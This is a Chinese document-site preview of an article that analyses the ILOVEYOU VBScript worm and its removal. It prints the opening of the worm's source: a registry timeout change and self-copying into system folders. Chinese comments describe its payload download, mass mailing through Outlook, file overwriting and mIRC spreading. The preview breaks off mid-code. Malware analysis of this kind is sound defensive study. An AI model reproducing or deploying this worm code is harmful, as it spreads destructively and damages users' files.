返回
“爱虫(i_loveyou)”病毒代码解析和杀毒方法

“爱虫(i_loveyou)”病毒代码解析和杀毒方法

ID:12357483

大小:92.50 KB

页数:36页

时间:2018-07-16

“爱虫(i_loveyou)”病毒代码解析和杀毒方法_第1页
“爱虫(i_loveyou)”病毒代码解析和杀毒方法_第2页
“爱虫(i_loveyou)”病毒代码解析和杀毒方法_第3页
“爱虫(i_loveyou)”病毒代码解析和杀毒方法_第4页
“爱虫(i_loveyou)”病毒代码解析和杀毒方法_第5页
资源描述:

《“爱虫(i_loveyou)”病毒代码解析和杀毒方法》由会员上传分享,免费在线阅读,更多相关内容在教育资源-天天文库

1、“爱虫(ILoveyou)”病毒代码解析和杀毒方法中国代码联盟黄冬李文武  近来在网上出现了“我爱你”病毒,让人们恐慌一时,而它在国内却没有出现什么问题,到现在我也没有听到有哪位计算机使用者说自己被爱到至死。究其原因是什么?而“我爱你”病毒到底是什么?难道说是我国的计算机防毒水平和计算机杀毒软件的水平已经到了世界领先的水平?我们来细细看看它的原因就明白其中的道理了。另:笔者写本文完全是为了学术作用,请不要将此病毒代码用于破坏之目的。  首先让我们来看一看我爱你病毒的来源。有一天你会收到一封邮件,它的主题是“ILoveYou”(如果细细

2、读读它的程序,这个主题其实可以并不是ILoveYou),在它的信中带有了一个叫“iloveyou.vbs”的附件,而这个附件将是病毒的根源。下面这段是“我爱你”病毒的所有的源代码,其中加入了我的注释(大多数的vbs的语法大家可以到wsh中去查、我在函数调用的地方写明了这些函数的说明,具体实现可以到函数体中去找):Rem=======================================================================Rem本文件为病毒样本,供学习之用,原文件中扫描文件进行感染部分被我注释掉了R

3、em请勿将本文件用作破坏之目的。white(wwwasp@yeah.net)hd(hd@email.com.cn)Rem=======================================================================OnErrorResumeNextdimfso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,doweq=""ctr=0Setfso=CreateObject("Scripting.FileSystemObject")setfile=

4、fso.OpenTextFile(WScript.ScriptFullname,1)vbscopy=file.ReadAllmain()submain()OnErrorResumeNextdimwscr,rrsetwscr=CreateObject("WScript.Shell")rr=wscr.RegRead("HKEY_CURRENT_USERSoftwareMicrosoftWindowsScriptingHostSettingsTimeout")if(rr>=1)thenwscr.RegWrite"HKEY_CURR

5、ENT_USERSoftwareMicrosoftWindowsScriptingHostSettingsTimeout",0,"REG_DWORD"endifSetdirwin=fso.GetSpecialFolder(0)Setdirsystem=fso.GetSpecialFolder(1)Setdirtemp=fso.GetSpecialFolder(2)Setc=fso.GetFile(WScript.ScriptFullName)c.Copy(dirsystem&"MSKernel32.vbs")c.Copy(

6、dirwin&"Win32DLL.vbs")c.Copy(dirsystem&"LOVE-LETTER-FOR-YOU.TXT.vbs")'上面三句将自身复制成三个文件regruns()'如果系统为win98,设IE的起始页为四个URL之一,以下载一个叫WIN-BUGSFIX.exe的文件,'并将其设为系统启动时自动执行的程序,看起来好象是一个补丁程序html()'为OUTLOOK用户生成一个含病毒代码的HTML文件LOVE-LETTER-FOR-YOU.HTM,'该HTML文件里包含一段JAVASCRIPT,打开时脚本被执行,病

7、毒体被写入文件MSKernel32.vbs,同时被设成'系统启动时自动执行spreadtoemail()'为OUTLOOK里的所有联系人发一封包含上面那个文件的邮件listadriv()'扫描整个磁盘,将后缀为.vbs,..vbe的文件换成自身,将后缀为.js,.jse,.css,.wsh,.sct,.hta,'的文件改后缀为vbs并写入自身,同时删除原有文件,将后缀为.jpg,.jpeg的在文件名后加.vbs后,写入'自身,将后缀为.mp3,mp2的文件名后加.vbs并写入自身,同时将文件属性改为隐藏文件,'如果发现有mIRC,将改

8、写script.ini,使得mIRC向所有频道里的人发送刚才的html文件。endsubsubregruns()OnErrorResumeNextDimnum,downreadregcreate"HKEY_LOCAL_M

当前文档最多预览五页,下载文档查看全文

此文档下载收益归作者所有

当前文档最多预览五页,下载文档查看全文
温馨提示:
1. 部分包含数学公式或PPT动画的文件,查看预览时可能会显示错乱或异常,文件下载后无此问题,请放心下载。
2. 本文档由用户上传,版权归属用户,天天文库负责整理代发布。如果您对本文档版权有争议请及时联系客服。
3. 下载前请仔细阅读文档内容,确认文档内容符合您的需求后进行下载,若出现内容与标题不符可向本站投诉处理。
4. 下载文档时可能由于网络波动等原因无法下载或下载错误,付费完成后未能成功下载的用户请联系客服处理。